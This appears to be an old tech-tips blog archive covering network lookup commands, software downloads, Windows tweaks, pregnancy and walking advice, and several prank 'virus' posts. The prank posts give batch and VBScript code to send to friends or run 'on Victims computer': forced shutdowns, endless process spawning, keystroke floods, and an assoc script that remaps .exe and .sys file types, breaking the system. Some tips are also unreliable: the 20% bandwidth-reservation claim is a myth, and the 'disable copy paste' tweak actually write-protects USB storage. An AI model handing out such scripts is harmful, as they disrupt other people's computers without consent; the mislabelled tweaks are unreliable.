Sunday, August 30, 2009

What does it mean to give MORE than 100%?

What Makes 100%? What does it mean to give MORE than 100%? Ever wonder about those people who say they are giving more than 100%? We have all been to those meetings where someone wants you to give over 100%. How about achieving 103%? What makes up 100% in life?

Here’s a little mathematical formula that might help you answer these questions:

If:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

is represented as:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26.


Then:

H-A-R-D-W-O-R- K
8+1+18+4+23+15+18+11 = 98%

and

K-N-O-W-L-E-D-G-E
11+14+15+23+12+5+4+7+5 = 96%

But,

A-T-T-I-T-U-D-E
1+20+20+9+20+21+4+5 = 100%

And,

B-U-L-L-S-H-I-T
2+21+12+12+19+8+9+20 = 103%

AND, look how far *SS kissing will take you.

A-S-S-K-I-S-S-I-N-G
1+19+19+11+9+19+19+9+14+7 = 118%


So, one can conclude with mathematical certainty that, while Hard work and Knowledge will get you close, and Attitude will get you there, it’s the Bullshit and *SS kissing that will put you over the top.

Don’t you just Love it!!!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How do I find out if an IP is contactable?

If the host is not blocking ICMP echo requests (type 8, code 0) try using the "ping" command, it should work from any Unix like OS and from Windows.

UP:

C:\>ping 192.168.1.3

Pinging 192.168.1.3 with 32 bytes of data:

Reply from 192.168.1.3: bytes=32 time<10ms TTL=255
Reply from 192.168.1.3: bytes=32 time<10ms TTL=255
Reply from 192.168.1.3: bytes=32 time<10ms TTL=255
Reply from 192.168.1.3: bytes=32 time<10ms TTL=255

Ping statistics for 192.168.1.3:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

Not Up

C:\>ping 192.168.30.133

Pinging 192.168.30.133 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.30.133:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

If the host is behind a firewall blocking ICMP echo requests then you will have to look into other ways of enumerating the network, like Hping ( http://www.hping.org/ )

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How Do I find the IP from the NetBIOS name?

On Windows:
C:\>nbtstat -a testbox3

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
testbox3<00> UNIQUE Registered
MYADS <00> GROUP Registered
testbox3<03> UNIQUE Registered
testbox3<20> UNIQUE Registered
MYADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered

MAC Address = 00-04-76-39-B6-D9
C:\>

On Unix:
[root@tux /root]# nmblookup testbox3
querying testbox3 on 192.168.31.255
192.168.22.68 testbox3<00>
[root@tux /root]#

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How do I tell who is logged into a remote Windows box?

On Windows you can try:
C:\>nbtstat -a somebox
Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
testbox2<00> UNIQUE Registered
MYADS <00> GROUP Registered
testbox2<03> UNIQUE Registered
MYADS <1E> GROUP Registered
JDOE 03> UNIQUE Registered

MAC Address = 00-04-76-39-A9-F9
C:\> But if Netbios over TCP/IP it turned off it won't work.
In that case you may have to use a WMI script, but you would have to be an Admin on the remote box. On Unix:

bash-2.05# nmblookup -S somebox
querying testbox2 on 192.168.31.255
192.168.22.59 somebox <00>
Looking up status of 192.168.22.59
testbox2 <00> - M
MYADS <00> - M
testbox2 <03> - M
MYADS <1e> - M
JDOE <03> - M

bash-2.05# The above will only work is the Windows box has Netbios over TCP/IP it turned on.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Wednesday, August 26, 2009

Backup Google Docs with GDocBackup

GDocBackup is simple utility to backup (export) all your documents from Google Documents to local disk. It does a simple backup: for each document in Google Docs, it downloads the document if the document is not present on the local disk or if it has a different date.

Usage of the backup software has been simplified. All that needs to be done is to enter the username and password of the Google Docs account and to select a directory on the local computer where the data should be downloaded to.

Download GdocBackup Here

http://code.google.com/p/gdocbackup/

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Restore Previously Closed Tabs in IE8

Human errors are always possible. Some time during browsing we accidentally close a tab of a website using Microsoft's Internet Explorer 8. Now, Let me tell you that Internet Explorer 8 has built-in function of storing 10 previously opened websites/tabs and also saves history. Now if you have closed some tabs forgetfully and want to reopen those tabs and websites there are very easy steps to restore or reopen those accidentally closed tabs in IE8.

Restore Internet Explorer Tabs Using Keyboard Shortcuts.

Press Ctrl + Shift + T from your keyboard at once. This will restore the latest closed tab. Now will again press Ctrl + Shift + T another tab that was closed prior before the latest closed tab will be restored. If you want to open more previously closed tabs or websites, Press Ctrl + Shift + T again and you can use this function up to 10 times in total. That means you can restore only 10 previously closed tabs/websites using Internet Explorer 8.

There is another function in Internet Explorer 8. By using this function you can see 10 previously closed websites/tabs with titles and more details. For applying this function, press Ctrl + T from your keyboard, this will open a new Tab in IE8 Tab bar. On this page, there will be a Reopen closed tabs section where you will see a list of 10 websites which were visited previously. Just Click on the title of webpage which you want to open again. There is also a link below all the website titles with text Open All. Just Click on this link if you want to open all 10 previously closed tabs/websites accidentally or forgetfully.

If you feel any difficulty or did not understand. Just Say Your Problem in Comments Form.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Convert Pictures into Art Work Automatically

Many People Like Photography and many like drawings or painting. If you are one of them who only like Photography and if you are weak in drawings and painting then there is a very useful software for you called FotoSketcher. FotoSketcher is an application/software which you can use to convert your digital pictures into beautiful drawings and paintings.

You Can Create Colorful and Black and White, both kind of drawings and paintings. You just have to use the sidebars for creating drawings and paintings. It is really useful and easy-to-use application for creating drawings from pictures. There are many styles available in this software like pencil sketch, pen, ink drawing and various painting renderings etc. FotoSketcher also include function to enhance contrast, simplify image, color saturation, increase luminosity, sharpening image etc.

The best thing of this software is its 100% free to use and is compatible with all versions of Windows (Windows 2000, Windows XP, Windows Vista, Windows 7 etc)

Download Link: (http://www.fotosketcher.com/PortableFotoSketcher.exe) to Download FotoSketcher

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to Split or Merge PDF Files Online or Offline

PDF (Portable Document Format) is widely used commonly for its portability and stability. Some times we edit or modify the contents of PDF file and we want to merge 2 or more than 2 PDF files into a single PDF file (Master PDF File). You can do this using FrameMaker Software but you will have to buy the license of this software BUT you can merge PDF files online also using a website called www.mergepdf.net This is a free web-based online serive which let you merge PDF files.

The Best Thing About MergePDF.net is you don't have to install any kind of software and you dont need you register there for using their 100% Free Service. You Can Merge 10 PDF Files at once by clicking on " Pick Files ". Each File should not be more than 5 mb in size.

Once You have picked all PDF files which you want to merge, click on Merge PDF button which is just below Pick Files. Now, MergePDF.net will automatically combine all your PDF files and will generate a master PDF files in few minutes. Now You will be able to download the master PDF File where all you PDF files will be combined.

PDFHammer.com (http://www.nitropdf.com/free/hammer/index.htm)is another website which provide you facility to edit or modify you PDF files online. You do not need to install any software for this. You Just need you upload your PDF file on PDFHammer.com and when your file is uploaded, you will be able to edit your PDF documents. You can arrange pages, delete pages and can do alot more with that free service.

PDFSAM (http://sourceforge.net/projects/pdfsam/files/pdfsam/2.0.0-alpha/pdfsam-win32inst-v2_0_0-alpha.exe/download)is an pen source software utility which is slightly complicated for first time users but its a power tool for extracting and merging PDF Files. There is also guidline and toturials attached with this software called pdfsam tutorial. You Only need 13MB of free hard-disk space for installing PDFSAM Software.

Arduo PDF merger (http://www.arduosoft.com/arduopdfmerger/ArduoPdfMerger_1.0_alpha.exe)is another application using which you can merge your PDF files. You can also split your PDF files using the same software. You can split pages of PDF files. It is easy-to-use software for merging/extracting PDF files. Its really small is size (1.40 mb) and user friendly application.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Convert Images into PDF

This summary is not available. Please click here to view the post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Sunday, August 23, 2009

Very Early Signs Of Pregnancy - Do You Know The 10 Pregnancy Signs?

Very early signs of pregnancy - are there 10 pregnancy signs? Yes, there are signs that indicate very early that you are pregnant. Some women will experience one or two of them, others will have several of the very early signs of pregnancy.

Once you have conceived, it will take about a week for the fertilized egg to implant in the uterus. As implantation happens, it is now possible to experience one or more of the 10 pregnancy signs and begin to know you are pregnant. Around this time, hormone levels begin to change, and the body reacts to these new hormone levels.

Here are 10 pregnancy signs:

1. Light Spotting - if you have conceived, spotting can happen when implantation occurs before your menstrual period should begin. Pregnancy bleeding from implantation is pinkish or brownish and not heavy. A normal menstrual flow should begin light, become heavy, then taper off again before ending.

2. More Frequent Urination - urinating more often is one of the very early signs of pregnancy. Many women experience more frequent urination even before a missed period, usually from about 7-12 days after the temperature rise at ovulation. The changes in hormone levels produced by implantation of the embryo, especially the hormone "human chorionic gonadotropin" (hCG), cause more frequent urination.

3. Elevated Body Temperature - it is normal to have an increase in body temperature at ovulation. Your basal body temperature staying elevated after ovulation is completed and remaining elevated through when your period should begin can be one of the very early signs of pregnancy.

4. Missing a Menstrual Period - a missed period is one of the obvious 10 pregnancy signs. However, you can miss a period for other reasons including illness, stress, hormone imbalance and reactions to foods or medications. If your menstrual cycle normally occurs very regularly, missing a period can be a sign.

5. Fatigue - lack of energy as one of the very early signs of pregnancy may be hard to distinguish from other kinds of exhaustion. Feeling tired is related to the change in hormones in the body, which usually disappears as the body adjusts to the new hormone levels.

6. Cramping - the uterus can contract often and regularly. Moving around, exercise and orgasm all can trigger uterine cramping in early pregnancy.

7. Nausea - morning sickness is the name given to feeling nauseated when pregnant. Of the 10 pregnancy signs, only about half of pregnant women experience nasea, and feeling nauseated can happen any time of the day or night.

8. Tender ******s and Breasts - one of the very early signs of pregnancy is a feeling of tenderness in the breasts and ******s. The good news is that these feelings of tenderness go away as the body becomes accustomed to the new hormone levels.

9. Darker Areolas - the area around the ******s becomes darker as early as one week after conception. The bumps on the areolas may look more prominent.

10. Constipation - you may notice a change in your bowels in early pregnancy. The intestines may relax and function less due to changing hormones and be one of the 10 pregnancy signs.

Once the very early signs of pregnancy are experienced, confirm pregnancy by using one of the better home pregnancy tests. There are major differences in the reliability of the home tests for pregnancy. A blood pregnancy test can be accurate as early as 8 to 10 days after conception, and a urine pregnancy test can be accurate as early as 10 to 14 days following conception. Pregnancy tests are not 100% accurate. If you feel you are pregnant but your pregnancy test result is negative, do the test again in a week or so and see your physician.

Remember to take good care of yourself and your body even before you become pregnant. Give up smoking and alcohol, eat healthy and begin exercising. Those first few weeks and your health are vitally important to help support healthy development of your new baby. Becoming pregnant and enjoying a successful pregnancy is a complex but wonderful experience. Besides knowing the 10 pregnancy signs, learn as much as you can about fertility, pregnancy and your health so your new baby will have the very best beginning to life that is possible.


When To Take A Pregnancy Test

Knowing when to take a pregnancy test will help you know whether or not you're pregnant. If you're wanting to know when to take a pregnancy test, the timing depends on the type of test.

There are two basic types of pregnancy tests - the urine test and the blood test. Both tests look for the hormone that is only present if a woman is pregnant. This hormone is called 'human chorionic gonadotropin', also referred to as 'hCG'. Blood tests can detect hCG about 6 to 8 days after you have ovulated. In general, urine tests can detect hCG about 14 days after ovulation.

When to take a pregnancy test at home is done by many women using a pregnancy test that will test the urine to determine if they are pregnant. Home pregnancy tests are convenient, inexpensive and are private. The urine test should be done using your first urine when you awake in the morning. When you have a positive home pregnancy test result, you should then see your health care provider soon. Your health care provider will confirm your home test result with a blood test plus a pelvic exam.

When to take a pregnancy test is important, because if you test too early in your pregnancy, there may not yet be enough of the pregnancy hormone in the urine to provide a positive test result. Most of the home pregnancy tests will be 90% accurate if you wait and test yourself one day after your missed period is due. If you feel you are pregnant but the home pregnancy test is negative, repeat the test again in a week if you still have not had your period. And if you are still getting negative test results and think you are pregnant, be sure and see your health care provider right away.

Pregnancy is a wonderful event that is complex, frustrating, satisfying and exciting. Your desire to become pregnant and having a child will have even more significance to you if it means you'll be taking better care of yourself and your partner. Besides knowing when to take a pregnancy test, learn as much as you can about improving your own health so you'll be providing that special little one the very best start to life that is possible.

Stress Relief During Pregnancy

If you truly want to ensure a great pregnancy, you should work on keeping a healthy and positive physical, mental and spiritual state. There is substantial evidence which suggests that a mother’s physical and mental wellness during pregnancy can affect not only the outcome of their pregnancy but the well being of their child later in life. You relationship with your baby begins at the moment of conception.

There are many things aside from physical factors that can impact your pregnancy. Stress is one of the more common problems many pregnant mothers face at some point during their pregnancy. While stress in and of itself isn’t always bad, prolonged stress can be damaging to a pregnancy. Most people associate stress that is harmful during pregnancy with physical labor. However, emotional stress may be just as damaging. Stress actually causes certain hormones in the body to be produced, and some scientists have suggested that these hormones can promote miscarriage or even bring on pre-term labor.

The best thin you can to do to ensure the well being of your baby is to minimize both physical and emotional stress as much as possible. Here are some stress reducing tips you can engage in during your pregnancy to promote a happy and healthy outcome:

Accept the fact that you are pregnant. Some women stress because they thrive on working a very demanding schedule, and attempt to continue to do so throughout their pregnancy. At some point or another however your pregnancy will catch up with you, and you will need to slow down a little bit. Rather than see this is as a burden, consider this a great time to prepare yourself for the life you are about to bring into the world. Take some time to pamper yourself a bit and give yourself more time for rest and relaxation during the week. This can be time that you spend just with yourself and your baby, without having to share with the world around you.

Give up some control. Having a baby changes everything. If you are the type of person that likes to be in control, keep in mind that there are many things related to pregnancy and child raising that will be out of your control. You won’t for example be able to sail through pregnancy without any aches and pains (unless you are extraordinarily lucky) but you can work to minimize them. You may have other symptoms such as fatigue and nausea that don’t go away. Some women have to go on bed rest during pregnancy. Simply recognizing however that some things are not under your control will help you get a better grip on your pregnancy and arm you to face the challenges that lie ahead.

Expect the unexpected. You just never know what will happen when you are pregnant. Your baby for example, might decide to come a few weeks early. You may find that midway through your pregnancy your physician recommends bed rest. If you prepare for the unexpected ahead of time however, when it happens it won’t seem like such a challenge and you will be better prepared to handle it.

Maintain close ties with friends, family and loved ones. Pregnancy is an emotional time. The more people you have around you to lean on, the less likely you will be to feel stressed.

Accept help. Let people know when you can use a hand. You don’t have to manage everything alone during pregnancy. If people offer to help you out and relieve some of the burden you are facing, be glad that there are people around you that love you enough to help out.

Another important thing to consider during pregnancy is communication. It is particularly important that you keep the lines of communication open with your partner during pregnancy. Remember that pregnancy is a very emotional time, and many women act in ways they would not ordinarily during their pregnancy. Don’t assume that your partner is a mind reader. This assumption has negatively impacted many relationships. If you have concerns, anxiety, feel sad or are even angry, be sure you share your feelings with your loved ones. Let people know what you are experiencing physically and emotionally and how it is affecting you. This will help them understand where you are coming from, and will help them learn the best way to help you during your pregnancy.

If you haven’t considered a prenatal massage already, you should during your pregnancy. Prenatal massage can be particularly helpful during the third trimester when your body is feeling burdened by the heavy load it is carrying. There are many qualified practitioners that offer prenatal massage in medical offices, chiropractic offices and even in traditional spa settings.

Exercise During Pregnancy

One of the best things you can do for yourself and your unborn child during pregnancy is exercise. There are numerous studies that show that women who exercise during pregnancy are more likely to have easy labor and deliveries and faster recoveries.

Before you start any exercise program during pregnancy it is essential that you consult with your healthcare provider. For some women it may be more dangerous than beneficial to exercise during pregnancy.

Once you get the go ahead from your doctor, you can embark on an exercise program that is suitable to your stage in pregnancy.

Here are just a few of the benefits associated with exercise during pregnancy:

- Exercise helps combat fatigue.
- Exercise helps minimize back pain because it helps strengthen back muscles.
- Exercise can help promote a smaller amount of fat gain during pregnancy.
- Exercise provides an exceptional form of stress relief.
- Women who exercising during pregnancy are less likely to experience difficult labors.
- Women who exercise during pregnancy are more likely to return to their pre-pregnancy weight faster and recover more quickly after delivery.

There are some forms of activity that are better than others during pregnancy. Certain exercises can help promote physical fitness and are less likely to result in injury. Among the best exercises for pregnant moms include:

- Walking
- Swimming
- Stretching
- Yoga
- Pilates
- Dancing
- Stationary Cycling
- Low Impact Prenatal Aerobics

How To Eat A Healthy Diet During Pregnancy

Perhaps the number one complaint of women trying to watch their weight during pregnancy is that they are hungry all the time. True, pregnancy does result in an increased metabolic demand on the body, which can cause you to be hungry. Many women also experience a number of cravings during pregnancy, which can make healthy eating challenging.

The first thing to remember is that the idea that you should eat for two is wrong. You only need an additional 300 calories per day, and generally you don’t need these calories until you are well on your way to the second and third trimesters.

So what can you do to help manage your weight and stick to a healthy diet?

Remember that during pregnancy it is vital that you do not cut back on your caloric intake. This has the potential to rob your baby of essential nutrients that are necessary for his/her growth and development. Here are some tips to help you stick to a healthy diet throughout your pregnancy:

Avoid skipping meals. If you have a habit of skipping breakfast, you’ll find that you are not only more fatigued but ravenous during your pregnancy, which will result in overeating. Be sure that you eat each meal every day.

Try eating several mini meals throughout the ay. This will not only help you feel fuller longer, it will help minimize the nausea often experienced during the first trimester.

Satisfy your cravings with nutritious snacks. Have a variety of healthy things to snack on readily available so you avoid overindulging in foods that are too decadent. If you are craving something sweet, consider having some mini chocolates near by or opt for a cup of hot chocolate. Both are far better for you than an entire candy bar or piece of cake.

Exercise during your pregnancy. The act of exercising in and of itself will be plenty to motivate you to stick to a healthy diet. You’ll feel better about yourself and find that you have more energy throughout the day.

Avoid high calorie beverages. Soda pop (which isn’t good for you anyway, particularly during pregnancy), juices and other flavored drinks often contain a good 100-300 calories per serving. Stick to water or flavored water during your pregnancy.

Drink lots of water. You may think you are hungry when in fact you are actually thirsty at many points during your pregnancy. In fact, the brains hunger and thirst centers often get mixed up, so people often feel hungry when they are in fact dehydrated. The better hydrated you are, the les likely you are to overeat.

Exercising After Pregnancy

Generally most women can begin a formal exercise program within 6 weeks of giving birth, though this time frame might be slightly longer for some women, including those recovering from a C-section. Most women recovering from a C-section will be able to exercise after there incision has healed and their doctor has cleared them for exercise.

Just how soon you begin an exercise program will depend in part on how you feel. If you had an easy delivery with no tearing and few interventions and regularly exercised prior to birth, you may feel up to some light exercise within 2 weeks of giving birth.

If this is the case, your doctor will probably allow you to engage in some light activities, including walking. Strenuous activity should generally be avoided however until several weeks after birth.

For some women however, even light exercise in the weeks following delivery is not possible. If you had an episiotomy or tore severely while delivering for example, your body may not physically be ready for a formal exercise program for at least 4-6 weeks after birth (note… this is also how long most physicians recommend that women abstain from intercourse!).

How soon you begin exercising thus depends on your body and your unique situation. Be sure you consult with your physician before embarking on a new exercise program regardless of your activity level before and during pregnancy.

Let’s say that one more time because it is important… YOU MUST CONSULT WITH YOUR HEALTHCARE PROVIDER IF YOU WANT TO EMBARK ON AN EXERCISE PROGRAM. Your body goes through a lot of physical trauma when you deliver a baby. Starting an exercise program too soon will delay your recovery and could potentially injure your body permanently. It may also take you longer than six weeks to heal fully if you start exercising too soon.

Now, if you feel better and capable of working out before you hit the six week mark, don’t hesitate to contact your healthcare provider. Most will encourage light exercise including walking, and some may encourage other types of activity particularly if you were active before you got pregnant.

Each and every individual is unique and different, thus their ability to return to a regular exercise routine will vary after delivery. It is important that you listen to your body.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Benefits of Walking Exercise

It is said that every person has two doctors with him... his right leg & his left leg. A vigorous 5 mile walk can do more good for an unhappy but otherwise healthy man than any medicine or psychology. it is the easiest exercise for most individuals, one that can done without equipment except good shoes, in most terrains & weather & also in very old age.

What we are talking about is not just walking but brisk walking.
Here are the benefits of the same:

Why walking ?
Walking is the most natural exercise known to man.

Besides this, here are the other benefits of walking:

1 ) Walking improves circulation
Calf muscles are man's second heart. On walking, these muscles pump the blood to the heart with all force. This leads to greater heart exercise, increased oxygen requirement & better blood circulation.

2) Walking is good for the heart
The increased oxygen requirements lead to exercise for the heart. On a long term basis, it leads to a better circulation for the heart. Thus it reduces the chances of a heart attack.

2 ) Walking cuts fatigue
Once daily brisk walking has become a habit, you start reaping the benefits.
Soon there is no need of any laxatives.
No more low back ache.
No more of that catch while bending.
Above all, in shape body is not easily fatigued.

3 ) Walking improves the posture.

4 ) Psychological benefits
Many studies have shown enormous psychological benefits of walking. It has been shown that daily walking habit reduces anxiety, tension & improves mood.

What is "brisk walking"?
It has been shown that what works best is not walking but "brisk walking". Scientifically, it correlates with the pulse rate that you should achieve for the maximum benefit. However, simply speaking, brisk walking means : a level that's not just strolling; but not out pf breath either.

How many minutes a day should one walk briskly?
No study has established the exact time for the maximum benefit. However 45minutes to 1 hour is a good guide.

You can even incorporate it in your daily life style. That way you will automatically walk briskly to the office & for that matter anywhere. A short brisk walk is is worth two miles of ambling. That way you will easily get minimal amount of good exercise every day. And, as striding becomes a habit, you will soon get more exercise, willingly.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Be careful before eating Apples




Don't eat the skin of the apple if it's coated with wax.

Check before you eat, many of the fruits here in Gulf, WAX is being used as preservation purposes and then cold stored.

You might be surprised especially apples from USA and other parts are more than one year old, though it would look fresh

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Tuesday, August 18, 2009

Virus writing code..!!

friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya it's acts like a virus but not virus it's a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus don't worry it doesn't effect your PC.

Ok the below are the codes of Virus like acting.



* Convey your friend a lil' message and shut down his / her computer:

Type in notepad:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.



* Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.



* Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.



* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.



* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.


* Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.


All this works until system will restart so don't worry.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Ext_change Virus

Here in this article i came with Extension changer virus today i am gonna showing you how to change an Extension of an files.

What is Extension changer ?

Assume that all images (*.jpeg, Gif etc) are by default opening with "Windows Picture and Fax Viewer" but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.

1. Open a Notepad and copy and paste the below code

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

2. Save it as extension.bat, and now you are ready to go…

3. Execute this on Victims computer

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…

The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Folder Replicator Batch virus

Today i gonna show you how to make a batch file that creates a folder inside a folder & so on..

I know all of them are interested in making virus so once again i came up with new virus(not a virus but it's a batch file).

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.


1. Just open up a notepad, copy and paste the below code

cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2. Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, August 15, 2009

Scare your friends with fake Blue Screen of Death

The first one is about a screensaver that simulates the Blue Screen of Death (BSOD). You can download it for free and install in any PC to play a prank on your friends or family. The screensaver looks just like the real thing and it’s so realistic that it won’t disappear even after you move the mouse. In my first test, I was able to make it go away with a press of any button on the keyboard.

When you install the screensaver, you can set it up to display at a certain time and so play a little joke on your family members. Or if you have access to your friends’ computers, you can even install it there when they’re not looking. They will be very surprised :)

You can get the screensaver at this Microsoft Web site (http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx). Once you install the small file, you only need to extract it from the zip file to your C:\windows\system32 folder. Then go to your Display Properties (in Control Panel) and click on the Screensaver tab. Next, choose the SysinternalBluescreen screensaver from the list and click on Apply. Also change the timer if you want.

Have fun!

Note: BSOD usually comes up when your PC crashes and it means that there is a serious error with your hardware or software.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

‘Delete Windows’ prank

Here is a new addition to my "Prank"category. This time you can download an application that makes the victim think Windows has been deleted! This could be an awesome prank, provided you can install the file on a friend’s computer. Another option is, you send the file to your ‘victim’ and make them believe it’s some other, real file….and then suddenly, something goes very wrong J.

All you have to do is visit Computer Pranks (http://www.computerpranks.com/downloadable-pranks/default.cfm?ItemID=823) and download the “delete windows” file. Next, you have to extract the file and install it, and that’s it. When the user opens the file, the fun begins.

It is only a small file but it’s so popular that it’s been around for almost 10 years. For more pranks, please visit www.computerpranks.com

This is actually only a basic message saying Windows has been deleted, and you can easily click it away by pressing the Esc button. If you want something more advanced, you should try the delete windows file by file prank from PC Advisor (http://www.pcadvisor.co.uk/downloads/index.cfm?categoryid=1461&itemId=8128). This time, when you open the mystery file, the user has to confirm whether the Windows folder should be deleted. Even when No is clicked, the simulation begins anyway and gives the appearance of all files being deleted from the Windows directory. This is a real heartstopper

Please only do this to people who might appreciate this kind of prank. Otherwise you’ll be in trouble.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Increase your Windows internet bandwidth

Originally, Windows Operating System has limited your bandwidth for internet connection as much as 20% from the maximum possible allowed.

If you want to increase your bandwidth to have more rapid internet connection, you can easily reduce or simply empty the limit value.

Here are the guides:
1. Click on start and then Run
2. Type gpedit.msc then Ok
3. Click on Administrative Templates>Network>QoS Packet Scheduler
4. Then click on Limit Reserve Bandwidth and change it become Enabled
5. Change Bandwidth Limit Value become 0 and Apply, Ok
6. Restart your computer

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Disable copy paste function on Window

Sometimes we have important files that we don't want to share with others.
But, how if people accidentally find those files and duplicate or sent them to their portable storage.

To avoid above condition, simply applying this simple tip and the copy paste function will be unavailable.

Here are the steps:
1. Click Start>Run>type regedit then ok
2. Click HKEY_LOCALMACHINE>SYSTEM>CurrentControlSet>Control
3. Right click on Control choose New>Key then name it StorageDevicePolicies
4. Right click on StorageDevicePolicies then choose New>DWordValue then name it WriteProtect
5. Double click on WriteProtect, then change its value to 1
6. Then restart your computer

If succeeds, Error Copying File or Folder warning will now appear when trying to copy paste files

To return to default condition, simply change the value become 0 again.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Prevent Changing Wallpaper

Have your desktop wallpaper ever been changed by another user that use your account?
Oh... It sounds ok and doesn't matter you at all.

But how if that user change the wallpaper to something that shouldn't be seen by your kids yet and that one should be a problem right?

Actually you can easily prevent it by following this simple and very short trick that will enable you to lock your current wallpaper:
1. Click Start>Run and type gpedit.msc
2. Then click User Configuration>Administrative Templates>Control Panel>Display
3. On right side, double click on Prevent Changing Wallpaper
4. Then choose Enabled, and apply

Now you'll be unable to change the wallpaper anymore by using this trick, if you want to return it to default condition simply repeat above trick but now choose Not Configured instead of Enabled option.

Very easy trick, right?

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Delete Uninstalled Applications from Add/Remove Programs List

Did you ever find an application still listed on Add/Remove Programs though you've surely uninstalled it before?

This could happen because of imperfect uninstallation process or the uninstaller itself is a faulty-built one.

This trick will help you to remove those applications permanently from Add/Remove Programs.

Here are the steps:
1. Click Start>Run and then type regedit.
